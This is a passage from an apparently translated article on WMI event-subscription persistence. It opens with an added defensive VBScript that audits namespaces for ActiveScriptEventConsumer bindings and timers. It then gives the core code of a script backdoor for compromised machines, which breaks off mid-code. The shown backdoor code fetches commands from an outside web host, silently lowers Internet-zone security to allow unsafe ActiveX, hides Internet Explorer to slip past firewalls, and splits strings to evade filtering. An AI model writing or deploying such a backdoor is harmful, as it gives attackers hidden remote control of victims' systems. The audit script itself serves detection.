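The subscriptions, timer instructions and ASEC installation discussed in this section all leave instances in the CIM repository, which is exactly where an administrator can look for them. The following audit script is an added example written for readers of this article, not code from the original article or from any tool it mentions: it walks root\cimv2, root\subscription and root\default, reports whether the ActiveScriptEventConsumer class is registered in each, prints every filter-to-consumer binding with its WQL query and, for ASEC, the script text stored in the repository, and lists any interval or absolute timer instructions. The namespace list and the file name wmi_audit.vbs are assumptions.

```vbscript
' Constructed audit script (added example, not from the original article).
' Walks the namespaces where ASEC is normally registered and prints every
' permanent subscription, so unexpected filter/consumer pairs stand out.
' Usage (file name assumed): cscript //nologo wmi_audit.vbs
Option Explicit

Dim nsList, ns
nsList = Array("root\cimv2", "root\subscription", "root\default")
For Each ns In nsList
    AuditNamespace ns
Next

Sub AuditNamespace(ns)
    Dim svc, binds, bind, flt, cons, timers, t
    On Error Resume Next
    Set svc = GetObject("winmgmts:\\.\" & ns)
    If Err.Number <> 0 Then
        WScript.Echo "[" & ns & "] cannot connect: " & Err.Description
        Err.Clear
        Exit Sub
    End If
    WScript.Echo "=== " & ns & " ==="

    ' On 2000 ASEC lives in root\default and on XP/2003 in root\subscription;
    ' seeing the class in root\cimv2 means scrcons.mof was compiled there.
    Err.Clear
    svc.Get "ActiveScriptEventConsumer"
    If Err.Number = 0 Then
        WScript.Echo "ActiveScriptEventConsumer class is registered here"
    End If

    ' Each binding ties one filter (the WQL trigger) to one consumer (the action).
    Err.Clear
    Set binds = svc.InstancesOf("__FilterToConsumerBinding")
    If Err.Number = 0 Then
        For Each bind In binds
            WScript.Echo "Binding : " & bind.Path_.RelPath
            Err.Clear
            Set flt = svc.Get(bind.Filter)
            If Err.Number = 0 Then
                WScript.Echo "  filter  : " & flt.Name & " [" & flt.QueryLanguage & "] " & flt.Query
            Else
                WScript.Echo "  filter  : <missing> " & bind.Filter
            End If
            Err.Clear
            Set cons = svc.Get(bind.Consumer)
            If Err.Number = 0 Then
                WScript.Echo "  consumer: " & cons.Path_.Class & " " & cons.Name
                ' For ASEC the payload is script text that exists only in the repository.
                If cons.Path_.Class = "ActiveScriptEventConsumer" Then
                    WScript.Echo "  engine  : " & cons.ScriptingEngine
                    WScript.Echo "  script  : " & cons.ScriptText
                ElseIf cons.Path_.Class = "CommandLineEventConsumer" Then
                    WScript.Echo "  command : " & cons.CommandLineTemplate
                End If
            Else
                WScript.Echo "  consumer: <missing> " & bind.Consumer
            End If
        Next
    End If

    ' Timer instructions fire without any system activity, which is why the
    ' article above treats them as an autostart source; list them explicitly.
    Err.Clear
    Set timers = svc.InstancesOf("__IntervalTimerInstruction")
    If Err.Number = 0 Then
        For Each t In timers
            WScript.Echo "Interval timer: " & t.TimerId & " every " & t.IntervalBetweenEvents & " ms"
        Next
    End If
    Err.Clear
    Set timers = svc.InstancesOf("__AbsoluteTimerInstruction")
    If Err.Number = 0 Then
        For Each t In timers
            WScript.Echo "Absolute timer: " & t.TimerId & " at " & t.EventDateTime
        Next
    End If
    Err.Clear
End Sub
```

Run it as an administrator, since reading root\subscription and the consumer instances requires full access to the namespaces. A binding whose filter polls __InstanceModificationEvent or a timer class and whose consumer is an ActiveScriptEventConsumer with script text you do not recognise is the pattern this section describes; the uninstall script shown earlier removes such a binding, its filter and its consumer by name.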
When the various Trojans on a broiler have all been removed by anti-virus software, the back door script waiting behind the scenes 24 hours a day may be your last hope. Below is the core code of a simple script back door (without the installation function):
cmdu = "http://myweb.8866.org/cmd.txt" 'URL of the command file downloaded from the web server
cmdw = 4000 'download timeout, 4 seconds
cmdl = "HKLM\Software\Microsoft\WBEM\CIMOM\cmdlength" 'name of the registry value recording the command length
on error resume next 'ignore uncaught errors (comment out when debugging)
set shl = createobject("wscript.shell") 'although the WScript root object is unavailable, its child objects can still be used
set aso = createobject("adodb.stream")
set ie = createobject("internetexplorer.application") 'use IE to get through the firewall
zone = "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3"
set1 = zone & "\1201"
set2 = zone & "\1400"
set3 = zone & "\CurrentLevel"
val1 = shl.regread(set1) 'save the original security settings
val2 = shl.regread(set2)
val3 = shl.regread(set3)
regd = "reg_dword"
shl.regwrite set1, 0, regd 'allow unsafe ActiveX to run in the Internet zone
shl.regwrite set2, 0, regd 'allow active scripting
shl.regwrite set3, 0, regd 'set the current security level of the Internet zone to "custom"
ie.visible = 0 ': ie.visible = 1 '(debugging)
ie.navigate "about" & ":blank" 'the string concatenation is purely to get past the forum filter
ie.document.write _